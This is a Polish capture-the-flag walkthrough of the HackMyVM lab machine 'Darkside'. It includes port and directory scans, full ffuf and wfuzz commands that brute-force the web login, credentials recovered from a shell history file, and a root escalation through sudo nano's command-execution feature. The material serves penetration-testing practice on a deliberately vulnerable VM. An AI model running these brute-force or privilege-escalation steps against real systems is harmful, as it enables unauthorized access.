Darkside - boyras200

00. Metainfo

Nazwa: Darkside
Autor: boyras200
Wypuszczony: 2023-10-30
Ściągnij: HackMyVM
Poziom: Łatwy
System: Linux
Nauczysz się: WWW, bruteforce

01. Wstęp

Darkside jest pierwszą maszyną od boyras200. Jest to bardzo prosta maszynka, ale wg mnie jest to bardzo udany debiut. Wystarczą do niej proste narzędzia i proste polecenia, więc lecimy…

02. Skanowanie otwartych portów

Na początek zarzućmy skanowanie portów:

[*] Workspace: hmv-darkside
msf6 > db_nmap 172.16.1.117
[*] Nmap: Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-10 18:22 CET
[*] Nmap: Nmap scan report for darkside.lan (172.16.1.117)
[*] Nmap: Host is up (0.00082s latency).
[*] Nmap: Not shown: 998 closed tcp ports (reset)
[*] Nmap: PORT  STATE SERVICE
[*] Nmap: 22/tcp open ssh
[*] Nmap: 80/tcp open http
[*] Nmap: MAC Address: 08:00:27:7E:B0:2A (Oracle VirtualBox virtual NIC)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

02. Skanowanie zasobów na WWW

Poskanujmy WWW programem Feroxbuster:

root@kali2023:~# feroxbuster -u http://172.16.1.117

 ___ ___ __  __   __   __     __  ___
|__ |__ |__) |__) | / `  / \ \_/ | | \ |__
|  |___ | \ | \ | \__,  \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓         ver: 2.10.0
───────────────────────────┬──────────────────────
 🎯 Target Url      │ http://172.16.1.117
 🚀 Threads        │ 50
 📖 Wordlist       │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌 Status Codes     │ All Status Codes!
 💥 Timeout (secs)    │ 7
 🦡 User-Agent      │ feroxbuster/2.10.0
 💉 Config File      │ /etc/feroxbuster/ferox-config.toml
 🔎 Extract Links     │ true
 🏁 HTTP methods     │ [GET]
 🔃 Recursion Depth    │ 4
 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404   GET    9l    31w   274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403   GET    9l    28w   277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200   GET    74l   300w   2121c http://172.16.1.117/styles.css
200   GET    29l    45w   683c http://172.16.1.117/
301   GET    9l    28w   313c http://172.16.1.117/backup => http://172.16.1.117/backup/
200   GET    10l    36w   205c http://172.16.1.117/backup/vote.txt
[####################] - 16s  30003/30003  0s   found:4    errors:0   
[####################] - 16s  30000/30000  1904/s http://172.16.1.117/ 
[####################] - 0s   30000/30000  4285714/s http://172.16.1.117/backup/ => Directory listing 

Zostały znalezione dwie ciekawe pozycje: http://172.16.1.117/backup/ i http://172.16.1.117/backup/vote.txt, ale wcześniej wejdźmy na główną stronę:

www Niestety, admin/admin nie działa ;) Trzeba próbować dalej…

03. Użytkownik kevin

rijaba: Yes xerosec: Yes sml: No cromiphi: No gatogamer: No chema: Yes talleyrand: No d3b0o: Yes Since the result was a draw, we will let you enter the darkside, or at least temporarily, good luck kevin.

Z notatki backup/vote.txt się dowiadujemy, że prawdopodobnie użytkownikiem, którym powinniśmy działać jest kevin, ale dla pewności wpiszmy wszystkich, których znaleźliśmy do pliku userzy.txt.

04. Ffuf i Wfuzz

Skoro znamy login, spróbujmy znaleźć i hasło. Do tego na użyłem programu Ffuf, ale na początku źle mi działał z dwoma parametrami. Coś mi się nie zgadzało, ogromne słowniki nic nie znalazły. Okazało się, że trzeba było w Ffuf podczas skanowania dopisać dodatkowy parametr -H z nagłówkiem i wtedy poszło. Natomiast we Wfuzz wszystko działało zgodnie z oczekiwaniem, bez żadnych dodatkowych kombinacji. Do obu skanerów użyłem słownika /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt. A do pliku userzy.txt wrzuciłem użytkowników z listy. Podaje dwie metody skanowania: Ffuf i Wfuzz.

ffuf -H "Content-Type: application/x-www-form-urlencoded" -fs=745 -w userzy.txt:PAR1 -w /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt:PAR2 -d 'user=PAR1&pass=PAR2' -u http://172.16.1.117/index.php

    /'___\ /'___\      /'___\    
    /\ \__/ /\ \__/ __ __ /\ \__/    
    \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\   
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/   
     \ \_\  \ \_\ \ \____/ \ \_\    
     \/_/  \/_/  \/___/  \/_/    

    v2.1.0-dev
________________________________________________

 :: Method      : POST
 :: URL       : http://172.16.1.117/index.php
 :: Wordlist     : PAR1: /tmp/userzy.txt
 :: Wordlist     : PAR2: /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt
 :: Header      : Content-Type: application/x-www-form-urlencoded
 :: Data       : user=PAR1&pass=PAR2
 :: Follow redirects : false
 :: Calibration   : false
 :: Timeout     : 10
 :: Threads     : 40
 :: Matcher     : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter      : Response size: 745
________________________________________________

[Status: 302, Size: 683, Words: 162, Lines: 30, Duration: 1ms]
  * PAR1: kevin
  * PAR2: iloveyou

:: Progress: [9000/9000] :: Job [1/1] :: 91 req/sec :: Duration: [0:00:04] :: Errors: 0 ::

real  0m4,298s
user  0m3,633s
sys   0m1,097s
wfuzz -w userzy.txt -w /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt -d 'user=FUZZ&pass=FUZ2Z' -u http://172.16.1.117/index.php --hh 745
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer             *
********************************************************

Target: http://172.16.1.117/index.php
Total requests: 9000

=====================================================================
ID      Response  Lines  Word    Chars    Payload                                   
=====================================================================

000008050:  302    29 L   45 W    683 Ch   "kevin - iloveyou"                              

Total time: 6.460363
Processed Requests: 9000
Filtered Requests: 8999
Requests/sec.: 1393.110


real  0m6,985s
user  0m6,413s
sys   0m1,453s

Ffuf był szybszy od Wfuzz, jednak do Ffuf trzeba było dodać dodatkowy parametr z nagłówkiem -H. Jak można było zauważyć, mamy login i hasło do strony.

05. Zabawa z rozkodowaniem

Dalej jest prosta zabawa ze zgadywaniem haseł. Jest to takie proste, że nie będę zabierał przyjemności z przejścia. Kombinujemy, aż na ekranie pokaże się login i hasło do SSH.

www

06. SSH

Mam nadzieję, że doszliście do etapu, gdzie na stronie zostało podane login i hasło. Po zalogowaniu się na konsolę jest pierwsza nagroda w pliku users.txt. Jednak idźmy dalej. Patrzymy historie, a w niej ciekawe rzeczy: login i hasło do konta rijaba

kevin@darkside:~$ cat .history 
ls -al
hostname -I
echo "Congratulations on the OSCP Xerosec"
top
ps -faux
su rijaba
ILoveJabita
ls /home/rijaba

07. rijaba

Użytkownik rijaba ma dostęp do programu Nano (Nie wiem po co w realnym świecie, ktoś miałby mu to dawać, ale to nieważne ;), ale dostęp jest.

rijaba@darkside:/home/kevin$ sudo -l
Matching Defaults entries for rijaba on darkside:
  env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User rijaba may run the following commands on darkside:
  (root) NOPASSWD: /usr/bin/nano
rijaba@darkside:/home/kevin$ 

A jak wiadomo przez Nano można uruchamiać różne programy, w tym Bash. Sztuczka polega na tym, że w programie odczytujemy plik ^R, i zamiast podać ścieżkę do pliku, uruchamiamy komendę uruchamiającą, czyli ^X. Następnie w “Command to execute:” wpisujemy reset;

08. root

sudo /usr/bin/nano

Alt text

Alt text

Jest i root :)

Zostaw komentarz